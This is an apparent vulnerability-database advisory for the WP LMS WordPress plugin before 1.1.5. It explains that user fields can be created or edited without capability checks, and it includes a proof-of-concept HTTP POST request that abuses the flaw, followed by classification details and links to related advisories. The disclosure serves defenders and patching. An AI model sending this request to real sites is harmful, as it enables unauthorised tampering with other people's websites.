WP LMS < 1.1.5 – Unauthenticated Arbitrary User Field Edition/Creation | Plugin Vulnerabilities

Description

The plugin is lacking any CSRF and capability checks when creating and editing User Fields, allowing unauthorised edition and creation of them either via CSRF or as any user (including unauthenticated)

v1.1.5 added CSRF but still no capability check

Proof of Concept

POST /wp-admin/admin.php?page=jslm_fieldordering&task=saveuserfield HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 208
Connection: close 

fieldtitle=ImageByAttacker&published=1&isvisitorpublished=1&required=0&search_user=1&search_visitor=1&form_request=jslearnmanager&id=28&isuserfield=0&fieldfor=3&save=Save

Affects Plugins

Fixed in 1.1.5

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Verified

Yes

WPVDB ID

56031d26-4b15-47d7-9fa3-135299d591da

Timeline

Publicly Published

2021-08-02 (about 4 years ago)

Added

2021-08-02 (about 4 years ago)

Last Updated

2021-08-02 (about 4 years ago)

Other

Published

Title

Published

2023-10-09

Title

Campaign Monitor Forms < 2.5.6 - Subscriber+ Arbitrary Options Update

Published

2023-06-19

Title

HTTP Headers < 1.18.11 - Admin+ Remote Code Execution

Published

2024-04-15

Title

Product Feed PRO for WooCommerce by AdTribes – WooCommerce Product Feeds for Google, Facebook/Meta, Bing, & More < 13.3.2 - Sensitive Information Exposure via Log Files

Published

2023-11-28

Title

JetEngine < 3.2.5 - Authenticated (Contributor+) Privilege Escalation

Published

2021-07-12

Title

Advanced Menu Manager < 3.0.7 - Unauthorised Menu Creation/Deletion